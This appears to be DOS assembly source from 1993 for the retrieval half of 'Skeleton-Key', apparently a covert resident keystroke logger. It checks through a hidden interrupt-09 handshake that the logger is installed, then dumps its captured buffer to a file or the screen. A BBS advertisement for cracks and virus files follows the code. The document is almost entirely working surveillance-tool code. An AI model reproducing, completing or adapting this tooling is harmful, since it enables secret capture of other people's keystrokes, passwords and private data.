;Skeleton-Key information retrieval program source code.

.model tiny
.radix 16
.code
        org 100h
start:
        mov     ax,0f00dh
        mov     bx,ax
        mov     cx,ax
        mov     dx,ax
        mov     si,ax
        mov     di,ax
        int     09

        mov     cx,4
        rol     ax,cl
        cmp     ax,0f00dh
        je      continueon
FileNotInstalled:
        push    cs
        pop     ds
        mov     ah,09
        mov     dx,offset NotInstalled
        int     21
        mov     ax,4c00
        int     21

continueon:
        push    es ds
        call    DumpReq        
        pop     ds es
        int     20
        
DumpReq:
        push    ds dx
        push    cs
        pop     ds
        mov     ah,09
        mov     dx, offset OurMessage
        int     21
        pop     dx ds

WaitForCorrectKey:
        xor     ax,ax
        int     16
        or      al,20
        cmp     al,'f'
        je      FileDump
        cmp     al,'s'
        je      ScreenDump
        jmp     WaitForCorrectKey
DoneDumps:
        ret

FileDump:
        mov     ah,3c
        xor     cx,cx
        int     21h
        jc      FileError
        xchg    bx,ax
        mov     dx,si
        mov     cx,100        
        
        push    cs
        pop     ds
        
Write_Loop:        
        push    cx
        mov     al,byte ptr es:[si]
        inc     si
        or      al,al
        jnz     StoreByte
        mov     al,20

StoreByte:
        mov     byte ptr [Byte2Write],al

        call    WritecharF

        cmp     byte ptr cs:[Byte2Write],0dh
        jne     NotRet1
        mov     byte ptr cs:[Byte2Write],0ah
        call    WritecharF

NotRet1:        
        pop     cx
        loop    Write_Loop
       

        mov     ah,3e
        int     21
        jmp     DoneDumps

ScreenDump:
        mov     cx,100

ScreenLoop:        
        push    cx
        lodsb
        or      al,al
        je      NoPrintEm
  PrintChar:        
        mov     ah,0e
        mov     cx,1
        xor     bx,bx
        int     10

        cmp     al,0dh
        jne     NoPrintEm
        mov     al,0ah
        jmp     PrintChar
        
   NoPrintEm:
        pop     cx
        loop    ScreenLoop
        
        jmp     DoneDumps


FileError:
        mov     dx,offset Ferror
 
 PrintError:        
        mov     ah,09
        int     21
        push    cs cs
        pop     ds es
        jmp     DoneDumps
FileError2:
        pop     cx cx
        mov     dx,offset Ferror2
        jmp     PrintError

Ferror  db      'Error Creating File!$'
Ferror2 db      'Error Writing To File!$'
Byte2Write      db      0

WriteCharF:        
        mov     ah,40
        mov     cx,1
        mov     dx,offset Byte2Write
        int     21
        jc      FileError2
        ret

OurMessage:      
db      'Thank you for using Skeleton-Key (c) 1993 National Spooks Anonymous.',0a,0dh  
db      'Dump to File or Screen (F/S)? $'
NotInstalled    db      'Hmmm.... Skeleton-Key does not seem to be installed.  Try doing that first.',0dh,0a,24
end start





;--- NOT PART OF SOURCE CODE --- BLATENT, POINTLESS BBS AD FOLLOWS ---
;________________________________________________________________________
;
;This file was downloaded from the ....
;
;        Ŀ
;        ۳
;           A D J A C E N T   R E A L I T Y   B B S     ۳
;              ۳
;           Forum for non-censored discussion and file  ۳
;           exchange for the expierenced computer user. ۳
;                                                       ۳
;   Ŀ
;     Cracks & Unprotects              Animations           
;     Encryption                       Home of SFDNC,SU,    
;     Virus/Anti-Virus                  SFNEW and much more. 
;     Virtual Reality                  ACTIVE message bases 
;   
;                 Call now at (615) 586-9515            ۳
;                                                       ۳
;        ۳
;        

